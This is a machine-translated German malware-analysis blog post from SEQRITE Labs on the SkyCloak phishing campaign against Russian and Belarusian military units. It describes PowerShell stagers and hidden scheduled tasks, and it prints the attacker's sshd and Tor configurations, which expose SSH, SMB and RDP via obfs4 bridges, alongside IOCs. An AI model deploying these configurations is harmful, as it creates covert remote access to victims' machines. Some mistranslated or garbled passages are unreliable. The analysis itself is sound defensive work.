Autoren: Sathwik Ram Prakki und Kartikkumar Jivani
Inhalte
- Einführung
- Hauptziele
- Branchen
- Geografischer Fokus
- Infektion und Lockvögel
- Technische Analyse
- PowerShell-Phase
- Beharrlichkeit
- Konfiguration
- Infrastruktur und Attribution
- Fazit
- SEQRITE Schutz
- IOCs
- MITRE ATT & CK
Einführung
SEQRITE Labs hat eine Kampagne identifiziert, die sich gegen Militärangehörige in Russland und Belarus richtet, insbesondere gegen die russischen Luftlandetruppen und die belarussischen Spezialeinheiten. Die Infektionskette führt zur Offenlegung mehrerer lokaler Dienste über Tor mithilfe von obfs4-Bridges, wodurch der Angreifer anonym über eine Onion-Adresse kommunizieren kann. In diesem Blog untersuchen wir die Infektionskette, die mehrere Stufen mittels PowerShell, Ködern zum Anlocken der Opfer und der Offenlegung von SSH als verstecktem Dienst nutzt, um den Tor-Verkehr zu ermöglichen und gleichzeitig die Persistenz aufrechtzuerhalten.
In diesem Jahr wurden mehrere Kampagnen mit ähnlichem geografischem Schwerpunkt identifiziert, wie zum Beispiel Hohlfeder Anfang 2025 wurde eine Kampagne gestartet, die verschiedene russische Einrichtungen wie akademische und Forschungsinstitute ins Visier nahm, die in direkter Verbindung zu Regierung und Verteidigung stehen. Im Juli stießen wir auf eine weitere Kampagne mit dem Namen „…“. CargoTalon das auf den Luft- und Raumfahrt- sowie den Verteidigungssektor Russlands abzielt, wo Eaglet-Implantate eingesetzt werden, wobei Überschneidungen mit HeadMare Die Gruppe wurde beobachtet. Kürzlich wurde ein Angriff auf die russische Automobil- und E-Commerce-Branche mit einer CAPI-Backdoor als Operation verfolgt. MotorBeacon.
Hauptziele
Branchen
- Ministry of Defence
Geografischer Fokus
- Russische Föderation
- Republik Weißrussland
Infektion und Lockvögel

Abb. 1 – Infektionskette
Der erste Anreiz besteht in einem Nominierungsschreiben des kommissarischen Kommandeurs der Militäreinheit 71289, der 83. Separaten Garde-Luftlandebrigade, die in Ussurijsk (Östlicher Militärbezirk) stationiert ist, an den Chef der russischen Luftlandetruppen (WDW) zur Ernennung von Militärpersonal. Ussurijsk liegt zwar in völligem Gegensatz zum andauernden russisch-ukrainischen Krieg, aber näher sowohl der chinesisch-russischen Grenze als auch dem Pazifik.

Abb. 2 – Täuschungsziel Russland
Der zweite Täuschungsbrief ist für die Schulung von Militärpersonal ab dem 13. Oktober bestimmt.th zu 16th 2025 bei der Militäreinheit 89417, die sich auf die 5. Separate Speznas-Brigade der belarussischen Spezialkräfte bezieht und in Maryina Horka bei Minsk stationiert ist (Berichten zufolge wurde die Einheit 2019 aufgelöst, aber 2021 wurden einige Aktivitäten beobachtet).

Abb. 3 – Täuschungsziel Belarus
Technische Analyse
Die Archivdateien wurden aus Belarus hochgeladen und tragen die Änderungsdaten 15. Oktober 2025 und 21. Oktober 2025. Die ursprüngliche Phishing-ZIP-Datei enthält eine LNK-Verknüpfung mit doppelter Dateiendung, die sich wie folgt übersetzen lässt:
| Originaler Dateiname | Übersetzter Name |
| ТЛГ на убытие на переподготовку.pdf.lnk | TLG-Abschied zur Umschulung.pdf.lnk |
| Исх №6626 Представление назначение на воинскую должность.pdf.lnk | Referenznummer 6626 Nominierung für die Besetzung einer militärischen Position.pdf.lnk |
Die Verknüpfungsdateien tragen die Maschinen-IDs „desktop-V7i6LHO“ und „desktop-u4a2HgZ“ und scheinen in der letzten Septemberwoche 2025 aktiviert zu werden. Sie lösen PowerShell-Befehle aus, die als erste Dropper-Stufe fungieren, wobei neben der LNK-Datei eine weitere Archivdatei verwendet wird, um die gesamte Kette einzurichten.

Abb. 4 – Verknüpfungsdatei löst PowerShell aus
Der Befehl extrahiert die erste Archivdatei in eines der beiden Verzeichnisse:
- %APPDATA%\dynamicUpdatingHashingScalingContext
- %USERPROFILE%\Downloads\incrementalStreamingMergingSocket
und verwendet es anschließend, um die zweite Archivdatei aus dem Ordner zu extrahieren.GEFUNDEN.000'. Diese mehrstufige Extraktion verteilt die Nutzdaten entweder auf '$env:APPDATA\logicpro' oder '$env:APPDATA\reaper' Verzeichnisse, liest den Inhalt einer Textdatei und führt diese im Hintergrund über einen versteckten PowerShell-Prozess aus.
- \logicpro\scalingEncryptingEncoding
- \reaper\responsiveHashingSocketScalableDeterministic
Bevor wir zum nächsten Schritt übergehen, betrachten wir den Inhalt beider Archive. Sie enthalten mehrere EXE-Dateien und Textdateien, die Köder-PDF-Datei, eine DLL-Datei und einige XML-Dateien. Im nächsten Schritt wird, wie oben beschrieben, ein PowerShell-Skript ausgeführt.

Abb. 5 – Inhalt der Archivdateien
PowerShell-Phase
Das Skript beginnt mit der Überprüfung des Windows-Ordners „Zuletzt verwendet“ und prüft, ob dieser mehr als zehn Verknüpfungen enthält. Dies ist ein Anti-Analyse Es wird geprüft, ob Sandbox-Umgebungen umgangen werden und ob normale Benutzeraktivität vorliegt. Außerdem wird geprüft, ob die Prozessanzahl 50 übersteigt und das Köderdokument geöffnet wird.

Abb. 6 – PowerShell-Anti-Analyse
Anschließend wird ein Mutex erstellt, um sicherzustellen, dass nur eine Instanz ausgeführt wird. Nach dem Ersetzen des Benutzernamens werden beide XML-Dateien gelesen und geplante Aufgaben registriert, um diese sofort zu starten. Dadurch wird die Persistenz hergestellt und die nächste Stufe der in diesen XML-Dateien definierten Nutzdaten ausgeführt. Mehrere Zeichenketten werden verkettet, um die vollständige Onion-Adresse zu bilden.

Abb. 7 – PowerShell-Stager
Dann wartet es, bis die Hostnamendatei existiert, die von Tor basierend auf der Konfiguration für das versteckte Dienstverzeichnis geschrieben wird. Es wartet also, bis die lokale Tor-Instanz ist online und die Zwiebel ist verfügbar. Sie erzeugt ein Identifikationssignal in einem bestimmten Format.: :3-yeeifyemoder endet mit ':2-lrwkymiund verwendet curl über einen lokalen Tor-SOCKS-Listener auf Port 9050. Mehrere Wiederholungsflags werden verwendet, um die Persistenz zu gewährleisten.

Abb. 8 – Lokaler Hostname für Beacon
Beharrlichkeit
XML-Dateien sind Windows-Aufgabendefinitionen, die täglich ab dem 1. Januar ausgeführt werden. 2025-09-25T01:41:00-08:00 und verfügt über einen Anmeldeauslöser für den angegebenen Benutzer. Diese Aufgaben sind ausgeblendet und so konfiguriert, dass sie auch im Leerlauf, bei Bedarf und ohne Netzwerkverbindung ausgeführt werden. Sie ignorieren Mehrfachinstanzen und haben keine Laufzeitbegrenzung.

Abb. 9 – XML für Persistenz

Abb. 10 – Geplante Aufgabe
Kommen wir nun zu den ausführbaren Dateien (EXEs), denen Konfigurationsdateien als Argumente übergeben werden; einige davon sind höchstwahrscheinlich SSH- und SFTP-Server-Binärdateien, basierend auf den PDB-Pfaden und internen Namen. XML-Dateien lösen entweder die ersten oder die letzten beiden Befehle aus (beide Kampagnen eingeschlossen):
- %AppData%/logicpro/githubdesktop.exe -f controllerGatewayEncrypting
- %AppData%/logicpro/pinterest.exe -f pipelineClusterDeployingCluster
- %AppData%/reaper/googlemaps.exe -f hashingBindingDynamicUpdatingSession
- %AppData%/reaper/googlesheets.exe -f decodingDistributedParsingHandlerRedundant
Beides githubdesktop.exe und googlemaps.exe von oben, zusammen mit ssh-shellhost.exe, ebay.exe (SFTP-Server) und libcrypto.dll (LibreSSL) sind legitime „OpenSSH für Windows“-Binärdateien mit dem Kompilierungszeitstempel 2023-12-13 und PDB-Pfaden:
- „C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sshd.pdb“
- „C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\sftp-server.pdb“
- “C:\a_work\1\s\OSS_Microsoft_OpenSSH_Dev\bin\x64\Release\ssh-shellhost.pdb”
- "C:\a_work\1\s\Libressl\libressl\build_X64\crypto\Release\libcrypto.pdb"
libcrypto.dll ist für Verschlüsselung, Schlüsselaustausch und Hashing gebündelt; wohingegen ssh-shellhost.exe wird für interaktive SSH-Sitzungen verwendet. Dies bestätigt, dass der Angreifer mithilfe von Tor einen eigenständigen OpenSSH-Server im Profilverzeichnis eines Benutzers einrichtet, wahrscheinlich zur unbemerkten Fernadministration und zur Persistenz nach der Ausnutzung der Schwachstelle.
Konfiguration
Die erste Konfiguration wurde an SSHD übergeben [githubdesktop.exe (oder) googlemaps.exeDie Vorgehensweise ist wie folgt, wobei der einzige Unterschied zwischen den beiden Kampagnen darin besteht, dass das SFTP-Subsystem in der zweiten Kampagne nicht vorhanden ist. Es wird der nicht standardmäßige Port 20321 verwendet, Passwörter sind deaktiviert und nur mit dem öffentlichen Schlüssel sowie Dateien, die private und autorisierte Schlüssel enthalten, möglich. Die Dateien mit diesen Schlüsseln sind:
- redundantOptimizingInstanceVariableLogging
- redundantExecutingContainerIndexing
- incrementalMergingIncrementalImmutableProtocol
- loggingOptimizedDecoding
Port 20321 Listenadresse 127.0.0.1 HostKey redundantOptimizingInstanceVariableLogging PubkeyAuthentication ja PasswordAuthentication No. AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing Teilsystem Sftp AppData\Roaming\logicpro\ebay.exe
Die zweite Konfiguration wird an pinterest.exe (oder) googlesheets.exe, was im Grunde genommen tor.exe, das einen Onion-Dienst erstellt und SSH-, SMB-, RDP- und andere Ports über Tor bereitstellt. Es ist so konfiguriert, dass es über eine EXE-Datei namens obfs4 ein austauschbares Transportprotokoll verwendet. confluence.exe (oder) rider.exe, was einfach ein o istbfs4proxy binärEs werden Bridges verwendet, um Verbindungen zu verschleiern. Bridge-Endpunkte werden mit IP-Adresse, Port, Fingerabdruck, Zertifikat und IAT-Modus definiert, um ausgehende Tor-Verbindungen über diese Bridges zu ermöglichen.

Abb. 11 – Kommunikation mit Tor-Brücken
HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/" HiddenServicePort 20322 127.0.0.1:20321 HiddenServicePort 11435 127.0.0.1:445 HiddenServicePort 13893 127.0.0.1:3389 HiddenServicePort 12192 127.0.0.1:12191 HiddenServicePort 14763 127.0.0.1:14762 GeoIPFile geoip GeoIPv6File geoip6 ClientTransportPlugin obfs4 exec confluence.exe UseBridges 1 Bridge obfs4 77.20.116.133:8080 2BA6DC89D09BFFA68947EF5719BFA1DC8E410FF3 cert=wILsetGQVClg0xNK5KWeKYCZJU48I9L+XiS4UVPfi3UQzU14lXuUhnuNiaeMzs2Z3yNfZw iat-mode=2 Bridge obfs4 156.67.24.239:33333 2F311EB4E8F0D50700E0DF918BF4E528748ED47C cert=xzae4w6xtbCRG4zpIH7AozSPI0h+lKzbshhkfkQBkmvB/DSKWncXhfPpFBNi5kRrwwVLew iat-mode=2
In gleicher Weise legitim obfs4proxy.exe wird umbenannt und in der Konfiguration verwendet als confluence.exe und rider.exe.
Infrastruktur und Attribution
Der Onion-Link, der zur Registrierung des Opfers über Tor verwendet wird, lautet:
- yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion
Basierend auf den aktuellen Netflow-Daten dieser Tor-Bridge-Ports konnten wir Datenverkehr mit Russland und sogar einigen Nachbarländern feststellen. Diese IPs werden entweder als Tor-Dienst- oder als private IPs kategorisiert.
| IP: Port | ASN | Land auswählen | Kategorie |
| 77.20.116[.]133:8080 | 3209 (Vodafone GmbH) | Deutschland | Wohngebäude, Stellvertreter |
| 156.67.24[.]239:33333 | 51167 (Contabo GmbH) | Frankreich | Do. |
| 146.59.116[.]226:50845 | 16276 (OVH SAS) | Polen | Cloud |
| 142.189.114[.]119:443 | 577 (BACOM) | Kanada |
Auf den Adressen 156.67.24[.]239:33333 und 77.20.116[.]133:8080 ist nur sehr geringer Datenverkehr zu verzeichnen. Auf den beiden übrigen IP-Adressen, die Teil der Konfiguration und der auf Russland abzielenden Köder sind, ist hingegen russischer Datenverkehr zu beobachten.

Zwei mit Russland verbundene Gruppen, APT44 (Sandwurm) und APT28Es wurde bereits beobachtet, dass diese Gruppen Tor zur Kommunikation mit Onion-Domains nutzen. In diesem Fall werden jedoch benutzerdefinierte Konfigurationen für Pluggable Transport und SSHD verwendet, um die Netzwerküberwachung zu umgehen. Die Angriffe zielen auf Russland und Belarus ab. Ähnliche Angriffe wurden auch von pro-ukrainischen APT-Gruppen beobachtet. Wütender Likho (Klebriger Werwolf) und Erwecke Likho (Core Werewolf), aber SkyCloak bleibt vorerst ohne Zuordnung.
Fazit
Es wurde eine mehrstufige Angriffskette identifiziert, die sowohl russisches als auch belarussisches Militärpersonal ins Visier nimmt. Diese Kette führt zu einem PowerShell-Stager, der OpenSSH- und Tor-Bridges einrichtet. Dies deutet auf eine verdeckte Kampagne hin, die darauf abzielt, unbemerkt Fernzugriff und laterale Bewegungen in den Zielumgebungen zu ermöglichen. Nach aktuellem Kenntnisstand scheint die Kampagne mit osteuropäischen Spionageaktivitäten im Zusammenhang mit dem Verteidigungs- und Regierungssektor übereinzustimmen, wobei die Zuordnung aufgrund bereits dokumentierter Operationen jedoch mit Unsicherheiten behaftet ist.
SEQRITE Schutz
- XML.Skycloak.50052.GC
- SCRIPT.Trojan.50053.GC
- SCRIPT.Skycloak.50054
IOCs
| Archiv (ZIP) | |
| 952f86861feeaf9821685cc203d67004 | ТЛГ на убытие на переподготовку.pdf |
| d246dfa9e274c644c5a9862350641bac | persistentHandlerHashingEncodingScalable.zip |
| 8716989448bc88ba125aead800021db0 | Исх №6626 Представление назначение на воинскую должность.pdf.zip |
| ae4f82f9733e0f71bb2a566a74eb055c | processorContainerLogging.zip |
| Verknüpfung (LNK) | |
| 32bdbf5c26e691cbbd451545bca52b56 | ТЛГ на убытие на переподготовку.pdf.lnk |
| 2731b3e8524e523a84dc7374ae29ac23 | Исх №6626 Представление назначение на воинскую должность.pdf.lnk |
| PowerShell (PS1) | |
| 39937e199b2377d1f212510f1f2f7653 | Skalierung Verschlüsselung Kodierung |
| 9242b49e9581fa7f2100bd9ad4385e8c | responsiveHashingSocketScalableDeterministic |
| XML | |
| b61a80800a1021e9d0b1f5e8524c5708 | loadingBufferFunctionHashing.xml |
| b52dfb562c1093a87b78ffb6bfc78e07 | incrementalRedundantRendering.xml |
| 45b16a0b22c56e1b99649cca1045f500 | synchronizingContextBufferSchemaIncremental.xml |
| dcdf4bb3b1e8ddb24ac4e7071abd1f65 | frameworkRepositoryDynamicOptimized.xml |
| Text | |
| e1a8daea05f25686c359db8fa3941e1d | Controller-Gateway-Verschlüsselung |
| b3382b6a44dc2cefdf242dc9f9bc9d84 | pipelineClusterDeployingCluster |
| 229afc52dccd655ec1a69a73369446dd | hashingBindingDynamicUpdatingSession |
| f6837c62aa71f044366ac53c60765739 | decodingDistributedParsingHandlerRedundant |
| 2599d1b1d6fe13002cb75b438d9b80c4 | redundantExecutingContainerIndexing |
| b7ae44ac55ba8acb527b984150c376e2 | redundantOptimizingInstanceVariableLogging |
| 0f6aaa52b05ab76020900a28afff9fff | redundantOptimizingInstanceVariableLogging.pub |
| 219e7d3b6ff68a36c8b03b116b405237 | loggingOptimizedDecoding |
| dfc78fe2c31613939b570ced5f38472c | incrementalMergingIncrementalImmutableProtocol |
| 77bb74dd879914eea7817d252dbab1dc | incrementalMergingIncrementalImmutableProtocol.pub |
| PE (EXE/DLL) | |
| f6c0304671c4485c04d4a1c7c8c8ed94 | githubdesktop.exe / googlemaps.exe (sshd.exe) |
| cdd065c52b96614dc880273f2872619f | pinterest.exe / googlesheets.exe (tor.exe) |
| 37e83a8fc0e4e6ea5dab38b0b20f953b | ebay.exe (sftp-server.exe) |
| 6eafae19d2db29f70fa24a95cf71a19d | ssh-shellhost.exe |
| 664f09734b07659a6f75bca3866ae5e8 | confluence.exe / rider.exe (obfs4proxy.exe) |
| 6eafae19d2db29f70fa24a95cf71a19d | libcrypto.dll |
| Lockvögel | |
| 23ad48b33d5a6a8252ed5cd38148dcb7 | ТЛГ на убытие на переподготовку.pdf |
| c8c41b7e02fc1d98a88f66c3451a081b | Исх №6626 Представление назначение на воинскую должность.pdf |
| Tor-Brücken | |
| 77.20.116[.]133:8080 156.67.24[.]239:33333
146.59.116[.]226:50845 142.189.114[.]119:443 |
|
| yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd[.]onion | |
MITRE ATT & CK
| Taktik | Technik-ID | Technikname |
| Ressourcenentwicklung | T1583 | Infrastruktur erwerben |
| Erster Zugriff | T1566.001 | Phishing: Spearphishing-Anhang |
| Ausführung | T1204.002 | Benutzerausführung: Schädliche Datei |
| T1059.001 | Befehls- und Skriptinterpreter: PowerShell | |
| T1106 | Native API | |
| Beharrlichkeit | T1053.005 | Geplante Aufgabe |
| T1547 | Boot- oder Anmelde-Autostart-Ausführung | |
| T1027 | Verschleierte Dateien oder Informationen | |
| Verteidigungsflucht | T1036 | Maskieren |
| T1497 | Virtualisierung/Sandbox-Umgehung | |
| Bewertung | T1083 | Datei- und Verzeichniserkennung |
| T1046 | Netzwerkdiensterkennung | |
| T1033 | Erkennung des Systembesitzers/Benutzers | |
| Seitliche Bewegung | T1021 | Remote-Dienste |
| Kollektion | T1119 | Automatisierte Sammlung |
| Command and Control | T1071 | Protokoll der Anwendungsschicht |
| T1090 | Proxy | |
| T1571 | Nicht-Standard-Port | |
| Exfiltration | T1041 | Exfiltration über C2-Kanal |



